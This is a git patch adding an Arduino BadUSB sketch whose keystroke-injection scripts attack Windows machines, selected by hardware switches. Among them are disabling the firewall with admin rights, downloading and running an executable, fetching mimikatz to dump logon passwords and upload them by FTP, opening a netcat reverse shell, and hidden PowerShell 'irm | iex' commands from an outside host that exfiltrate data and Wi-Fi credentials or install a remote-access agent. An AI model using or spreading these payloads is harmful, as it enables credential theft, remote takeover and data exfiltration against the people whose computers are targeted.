From ea238895f0414f5acae18150686437bbb2b7d8e3 Mon Sep 17 00:00:00 2001 From: Didier Asechimann Date: Tue, 21 Oct 2025 18:26:33 -0400 Subject: [PATCH] Upload New File win version --- ino/BadUSB_WIN.ino | 817 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 817 insertions(+) create mode 100644 ino/BadUSB_WIN.ino diff --git a/ino/BadUSB_WIN.ino b/ino/BadUSB_WIN.ino new file mode 100644 index 0000000..b591632 --- /dev/null +++ b/ino/BadUSB_WIN.ino @@ -0,0 +1,817 @@ +// +----------------------------------------------------------------+ +// | Multi Script USB key | +// | Last Update 2025-10-20 | +// | By Didier Aeschimann | +// | Version 1.0 | +// +----------------------------------------------------------------+ + +#include "Keyboard.h" + +bool Ro[8]; +bool OldRo=0; +bool CanRun = true; + +/******************************************************************** + * Opens the run bar and executes the command. + ********************************************************************/ +void CommandAtRunBarMSWIN(char *SomeCommand){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('r'); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Run the program with admin privileges. -Joel Serna Moreno + ********************************************************************/ +void RunProgramAdminMSWIN(char *SomeCommand){ + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.print(SomeCommand); + delay(3000); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_SHIFT); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(4000); + Keyboard.press(KEY_LEFT_ARROW); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Minimize open windows. -Joel Serna Moreno + ********************************************************************/ +void MinimizeWindowMSWIN(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('d'); + delay(100); + Keyboard.release('d'); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Open the search box. -Joel Serna Moreno + ********************************************************************/ +void CommandOpenSearchMSWIN(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('s'); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Block active sessions. -Joel Serna Moreno + ********************************************************************/ +void BlockSessionMSWIN(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('l'); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Close active program. -Joel Serna Moreno + ********************************************************************/ +void CloseProgramsMSWIN(){ + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_F4); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens the run bar and executes the command. + ********************************************************************/ +void CommandAtRunBarGnome(char *SomeCommand){ + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_F2); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens spotlight and executes the command. -Adam Baldwin + ********************************************************************/ +void CommandAtRunBarOSX(char *SomeCommand){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press(' '); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens New Terminal and executes command. -Adam Baldwin + ********************************************************************/ +void CommandAtNewTerminal(char *SomeCommand){ + CommandAtRunBarOSX("Terminal"); + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('n'); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens the run bar and executes the command. -Aaron Howell + ********************************************************************/ +void ShrinkCurWinOSX(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('h'); + delay(100); + Keyboard.releaseAll(); + delay(250); +} + +/******************************************************************** + * Shrinks the active window to help hide it. + ********************************************************************/ +void ShrinkCurWin(){ + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(' '); + delay(100); + Keyboard.releaseAll(); + delay(250); + Keyboard.print("n"); +} + +void ShrinkCurWinMSWIN(){ + ShrinkCurWin(); +} + +void ShrinkCurWinGnome(){ + ShrinkCurWin(); +} + +void PressAndRelease(int KeyCode,int KeyCount){ + int KeyCounter=0; + for (KeyCounter=0; KeyCounter!=KeyCount; KeyCounter++){ + Keyboard.print(KeyCode); + } +} + +/********************************************************************* + * ledkeys returns the setting of the "lock keys" + * Num Lock = 1 + * CAPS Lock = 2 + * Scroll Lock = 4 + * Add them together to get combos, for example if all three are on, 7 would be the result + *********************************************************************/ +/* +int ledkeys(void) +{ + return int(keyboard_leds); +} +*/ + +/********************************************************************* + * Returns TRUE if NUM Lock LED is on and FALSE otherwise. + *********************************************************************/ +/* +boolean IsNumbOn(void) +{ + if ((ledkeys() & 1) == 1){ + return true; + } + else { + return false; + } +} +*/ + +/********************************************************************* + * Returns TRUE if Caps Lock LED is on and FALSE otherwise. + **********************************************************************/ +/* +boolean IsCapsOn(void) +{ + if ((ledkeys() & 2) == 2){ + return true; + } + else { + return false; + } +} +*/ + +/********************************************************************* + * Returns TRUE if Scroll Lock LED is on and FALSE otherwise. + **********************************************************************/ +/* +boolean IsScrlOn(void) +{ + if ((ledkeys() & 4) == 4){ + return true; + } + else { + return false; + } +} +*/ +//******************************************************************** + +void RunScript_Win_DisableFirewall() { + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.print("cmd"); + delay(2000); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_SHIFT); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.press(KEY_LEFT_ARROW); + delay(100); + Keyboard.releaseAll(); + delay(4000); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.println("netsh advfirewall set currentprofile state off"); + delay(3000); + Keyboard.println("exit"); + CanRun=1; +} + +void RunScript_Win_DLandRunFile(){ + CommandAtRunBarMSWIN("powershell"); + delay(3000); + Keyboard.println("powershell Import-Module BitsTransfer;"); + delay(3000); + Keyboard.println("Start-BitsTransfer -Source \"http://server/file.exe\" -Destination \"%TEMP%\\file.exe\";"); + delay(3000); + Keyboard.println("Start-Process \"%TEMP%\\fichero.exe\""); + CanRun=1; +} + +void RunScript_Win_export_basic_information_wmic() { + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.println("cmd"); + delay(3000); + Keyboard.println("wmic bios get serialnumber>>information.txt"); + delay(3000); + Keyboard.println("wmic computersystem get model>>information.txt"); + delay(7000); + Keyboard.println("wmic product get name>>information.txt"); + delay(3000); + Keyboard.println("notepad information.txt"); + CanRun=1; +} + +void RunScript_Win_FakeUpdateScreen() { + CommandAtRunBarMSWIN("iexplore -k https://fakeupdate.net/sarcastic/"); + delay(3000); + Keyboard.press(KEY_F11); + delay(100); + Keyboard.releaseAll(); + CanRun=1; +} + +void RunScript_Win_mimikatz_passwords_windows_ftp() { + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.print("cmd"); + delay(2000); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_SHIFT); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.press(KEY_LEFT_ARROW); + delay(100); + Keyboard.releaseAll(); + delay(4000); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.println("ftp"); + delay(3000); + Keyboard.println("open IPSERVERFTP"); + delay(10000); + Keyboard.println("USERNAME"); + delay(3000); + Keyboard.println("PASSWORD"); + delay(5000); + Keyboard.println("binary"); + delay(2000); + Keyboard.println("GET mimikatz.exe"); + delay(5000); + Keyboard.println("bye"); + delay(3000); + Keyboard.println("mimikatz.exe"); + delay(4000); + Keyboard.println("log"); + delay(2000); + Keyboard.println("privilege::debug"); + delay(3000); + Keyboard.println("sekurlsa::logonPasswords full"); + delay(10000); + Keyboard.println("exit"); + delay(3000); + Keyboard.println("ftp"); + delay(3000); + Keyboard.println("open IPSERVERFTP"); + delay(10000); + Keyboard.println("USERNAME"); + delay(3000); + Keyboard.println("PASSWORD"); + delay(5000); + Keyboard.println("PUT mimikatz.log"); + delay(3000); + Keyboard.println("bye"); + delay(3000); + Keyboard.println("del mimikatz.exe & del mimikatz.log"); + delay(3000); + Keyboard.println("exit"); + CanRun=1; +} + +void RunScript_Win_lock_your_computer_message_prank() { + CommandAtRunBarMSWIN("notepad.exe"); + delay(5000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("Please remember to lock your computer when you step away from your desk."); + delay(2000); + Keyboard.println("Thank you."); + delay(2000); + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(' '); + Keyboard.print("x"); + delay(100); + Keyboard.releaseAll(); + CanRun=1; +} + +void RunScript_Win_netcat_ftp_and_reverse_shell() { + CommandAtRunBarMSWIN("cmd"); + delay(5000); + Keyboard.println("ftp"); + delay(2000); + Keyboard.println("open IPSERVERFTP"); + delay(5000); + Keyboard.println("USERNAME"); + delay(2000); + Keyboard.println("PASSWORD"); + delay(5000); + Keyboard.println("binary"); + delay(2000); + Keyboard.println("GET nc64.exe"); + delay(4000); + Keyboard.println("bye"); + delay(2000); + Keyboard.println("nc64.exe IP PORT -e cmd.exe -d"); +//https://github.com/int0x33/nc.exe/ + delay(5000); + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_F4); + delay(100); + Keyboard.releaseAll(); + CanRun=1; +} + +void RunScript_Win_Exfiltrate_Data() { + CommandAtRunBarMSWIN("powershell -w h -NoP -Ep Bypass ;irm www.home.daprogs.net/dl/exfil.ps1 | iex"); + CanRun=1; +} + +void RunScript_Win_Exfiltrate_Wifi() { + CommandAtRunBarMSWIN("powershell -w h -NoP -Ep Bypass ;irm www.home.daprogs.net/dl/wifi.ps1 | iex"); + CanRun=1; +} + +void RunScript_Win_Install_Mesh() { + CommandAtRunBarMSWIN("powershell -w h -NoP -Ep Bypass ;irm www.home.daprogs.net/dl/mesh.ps1 | iex"); + CanRun=1; +} + +// void RunScript_Nix_Install_Mesh() { +// Keyboard.print("(wget 'https://support.daprogs.net/meshagents?script=1' -O ./meshinstall.sh || wget 'https://support.daprogs.net/meshagents?script=1' --no-proxy -O ./meshinstall.sh) && chmod 755 ./meshinstall.sh && sudo -E ./meshinstall.sh https://support.daprogs.net 'INYpk$Xf2hkMKRCkGfy08RotsKO@62RZVe2KDw4WUq@QhwTCMs6uRfHzFruSR4GY' || ./meshinstall.sh https://support.daprogs.net 'INYpk$Xf2hkMKRCkGfy08RotsKO@62RZVe2KDw4WUq@QhwTCMs6uRfHzFruSR4GY'"); +// Keyboard.press(KEY_RETURN); +// Keyboard.releaseAll(); +// CanRun=1; +// } + +void SelectScript() { + Ro[0]=!digitalRead(2); // off=EN, on=FR + Ro[1]=!digitalRead(3); // Restart Switch + Ro[2]=!digitalRead(4); // bit 32 + Ro[3]=!digitalRead(5); // bit 16 + Ro[4]=!digitalRead(6); // bit 8 + Ro[5]=!digitalRead(7); // bit 4 + Ro[6]=!digitalRead(8); // bit 2 + Ro[7]=!digitalRead(9); // bit 1 + + OldRo = Ro[1]; // Reset switch 2 state + + byte value = 0; + for (int i = 7; i > 1; i--) { + if (Ro[i]) + value |= (1 << (7-i)); + } + + Serial.print(Ro[0]); + Serial.print(" "); + Serial.print(Ro[1]); + Serial.print(" "); + Serial.print(Ro[2]); + Serial.print(" "); + Serial.print(Ro[3]); + Serial.print(" "); + Serial.print(Ro[4]); + Serial.print(" "); + Serial.print(Ro[5]); + Serial.print(" "); + Serial.print(Ro[6]); + Serial.print(" "); + Serial.print(Ro[7]); + Serial.print(" "); + + if (Ro[0]) { // Select keyboard language with first switch + Keyboard.begin(KeyboardLayout_fr_FR); + Serial.print("FR"); + } + else{ + Keyboard.begin(KeyboardLayout_en_US); + Serial.print("EN"); + } + + Serial.print(" "); + Serial.print(value); + Serial.println(); + + delay(3000); + + switch (value) { + case 0: // All 6 switches (2-8) are in the off position + Serial.println("No Script Selected"); + CanRun=1; //Make sure switch 2 can retart a loop + break; + case 1: + Serial.println("Win_Install_Mesh"); + RunScript_Win_Install_Mesh(); + break; + case 2: + Serial.println("Win_Exfiltrate_Wifi"); + RunScript_Win_Exfiltrate_Wifi(); + break; + case 3: + Serial.println("Win_Exfiltrate_Data"); + RunScript_Win_Exfiltrate_Data(); + break; + case 4: + Serial.println("Win_netcat_ftp_and_reverse_shell"); + RunScript_Win_netcat_ftp_and_reverse_shell(); + break; + case 5: + Serial.println("Win_lock_your_computer_message_prank"); + RunScript_Win_lock_your_computer_message_prank(); + break; + case 6: + Serial.println("Win_mimikatz_passwords_windows_ftp"); + RunScript_Win_mimikatz_passwords_windows_ftp(); + break; + case 7: + Serial.println("Win_FakeUpdateScreen"); + RunScript_Win_FakeUpdateScreen(); + break; + case 8: + Serial.println("Win_export_basic_information_wmic"); + RunScript_Win_export_basic_information_wmic(); + break; + case 9: + Serial.println("Win_DLandRunFile"); + RunScript_Win_DLandRunFile(); + break; + case 10: + Serial.println("Win_DisableFirewall"); + RunScript_Win_DisableFirewall(); + break; + case 11: + Serial.println("11"); + CanRun=1; //Make sure switch 2 can retart a loop + break; + case 12: + Serial.println("12"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 13: + Serial.println("13"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 14: + Serial.println("14"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 15: + Serial.println("15"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 16: + Serial.println("16"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 17: + Serial.println("17"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 18: + Serial.println("18"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 19: + Serial.println("19"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 20: + Serial.println("20"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 21: + Serial.println("21"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 22: + Serial.println("22"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 23: + Serial.println("23"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 24: + Serial.println("24"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 25: + Serial.println("25"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 26: + Serial.println("26"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 27: + Serial.println("27"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 28: + Serial.println("28"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 29: + Serial.println("29"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 30: + Serial.println("30"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 31: + Serial.println("31"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 32: + Serial.println("32"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 33: + Serial.println("33"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 34: + Serial.println("34"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 35: + Serial.println("35"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 36: + Serial.println("36"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 37: + Serial.println("37"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 38: + Serial.println("38"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 39: + Serial.println("39"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 40: + Serial.println("40"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 41: + Serial.println("41"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 42: + Serial.println("42"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 43: + Serial.println("43"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 44: + Serial.println("44"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 45: + Serial.println("45"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 46: + Serial.println("46"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 47: + Serial.println("47"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 48: + Serial.println("48"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 49: + Serial.println("49"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 50: + Serial.println("50"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 51: + Serial.println("51"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 52: + Serial.println("52"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 53: + Serial.println("53"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 54: + Serial.println("54"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 55: + Serial.println("55"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 56: + Serial.println("56"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 57: + Serial.println("57"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 58: + Serial.println("58"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 59: + Serial.println("59"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 60: + Serial.println("60"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 61: + Serial.println("61"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + default: + // statements + break; + } +} + +void setup() { + Serial.begin(115200); + pinMode(2, INPUT_PULLUP); + pinMode(3, INPUT_PULLUP); + pinMode(4, INPUT_PULLUP); + pinMode(5, INPUT_PULLUP); + pinMode(6, INPUT_PULLUP); + pinMode(7, INPUT_PULLUP); + pinMode(8, INPUT_PULLUP); + pinMode(9, INPUT_PULLUP); + //Setup for first Run + delay(100); + OldRo = digitalRead(3); + CanRun = 1; +} + +void loop() { + delay(1000); + if (CanRun){ + if (OldRo != !digitalRead(3)){ + CanRun=0; + SelectScript(); + } + } +}